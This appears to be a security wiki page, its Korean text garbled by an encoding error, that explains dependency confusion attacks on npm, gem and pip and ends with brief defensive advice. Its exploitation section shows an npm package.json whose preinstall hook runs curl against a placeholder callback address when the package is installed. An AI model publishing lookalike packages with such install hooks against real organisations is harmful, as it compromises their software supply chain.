Back

Dependency Confusion

๐Ÿ” Introduction

Dependency Confusion์€ supply chain substitution attack ์œผ๋กœ๋„ ๋ถˆ๋ฆฌ๋ฉฐ ์„œ๋น„์Šค์—์„œ ์‚ฌ์šฉ์ค‘์ธ ๋‚ด๋ถ€ ํŒจํ‚ค์ง€์™€ ๋™์ผํ•œ ์ด๋ฆ„์˜ ํŒจํ‚ค์ง€๋ฅผ ๋“ฑ๋กํ•˜์—ฌ ์•…์˜์ ์ธ ํŒจํ‚ค์ง€๊ฐ€ ์„ค์น˜ ๋˜๋„๋ก ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค.

gem, pip, npm ๋“ฑ ํŒจํ‚ค์ง€ ๋งค๋‹ˆ์ €์— ๋”ฐ๋ผ ๋‹ค๋ฅด์ง€๋งŒ, ์ •ํ™•ํ•˜๊ฒŒ ๋ช…์‹œ๋˜์ง€ ์•Š์€ ์ƒํƒœ์—์„œ ์™ธ๋ถ€/๋‚ด๋ถ€์— ๋™์ผํ•œ ์ด๋ฆ„์˜ ํŒจํ‚ค์ง€๊ฐ€ ์žˆ๋Š” ๊ฒฝ์šฐ ์™ธ๋ถ€์—์„œ ํŒจํ‚ค์ง€๋ฅผ ๊ฐ€์ ธ์˜ค๊ธฐ๋„ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

e.g

[ packages ]
internal: xspear
public: xspear

[ gem install ]
gem install xspear (installed from public)

๐Ÿ—ก Offensive techniques

Detect

github ๋“ฑ ์†Œ์Šค์ฝ”๋“œ repository์—์„œ ์ง์ ‘ internal ํŒจํ‚ค์ง€๋ฅผ ํ™•์ธํ•˜๊ฑฐ๋‚˜ /package.json , composer.json ๋“ฑ ์™ธ๋ถ€์— ์˜๋„ํ•˜์ง€ ์•Š๊ฒŒ ๋…ธ์ถœ๋˜๋Š” ํŒจํ‚ค์ง€ ๊ด€๋ จ ํŒŒ์ผ์„ ์ฐธ๊ณ ํ•˜์—ฌ ํŒจํ‚ค์ง€ ๊ด€๋ฆฌ ๋„๊ตฌ์— ๋“ฑ๋ก๋˜์ง€ ์•Š์€ ์ด๋ฆ„์ด ์žˆ๋Š” ๊ฒฝ์šฐ Dependency Confusion์˜ ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.

Exploitation

npm. gem, pip ๋“ฑ ํŒจํ‚ค์ง€ ๋งค๋‹ˆ์ €์— ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ํฌํ•จํ•œ ํŒจํ‚ค์ง€๋ฅผ ๋“ฑ๋กํ•˜๋Š” ํ˜•ํƒœ๋กœ exploitํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

npm ํŒจํ‚ค์ง€๋ฅผ ์˜ˆ์‹œ๋กœ ๋“ค์–ด๋ณด๋ฉด ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. npm ํŒจํ‚ค์ง€์— ํ•„์š”ํ•œ package.json ํŒŒ์ผ๊ณผ main ํŒŒ์ผ์ธ js ํŒŒ์ผ์„ ํ•˜๋‚˜ ๋งŒ๋“  ํ›„ scripts์— ์›ํ•˜๋Š” ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ๋„ฃ์–ด๋‘๊ณ  internal ํŒจํ‚ค์ง€์™€ ๋™์ผํ•œ ์ด๋ฆ„์œผ๋กœ public ํŒจํ‚ค์ง€๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ๋“ฑ๋กํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค.

index.js

module.exports.hacked = function () {
    return "hacked"
}

package.json

{
  "name": "your-module-name",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "curl -i -k https://your-callback-address"
  },
  "author": "hahwul",
  "license": "MIT"
}

๐Ÿ›ก Defensive techniques

ํŒจํ‚ค์ง€ ๋งค๋‹ˆ์ €์—์„œ ์ง์ ‘ internal ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ ์ ˆ๋Œ€๊ฒฝ๋กœ๋ฅผ ์ง€์ •ํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ์ด๋ฅผ ํ†ตํ•ด์„œ ์ž„์˜๋กœ ์™ธ๋ถ€ ํŒจํ‚ค์ง€๊ฐ€ ์„ค์น˜๋˜๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ package.json ๊ฐ™์ด ์„œ๋น„์Šค์—์„œ ์‚ฌ์šฉํ•˜๋Š” dependency๋ฅผ ์•Œ ์ˆ˜ ์žˆ๋Š” ํŒŒ์ผ์€ ์™ธ๋ถ€์— ๋…ธ์ถœ๋˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0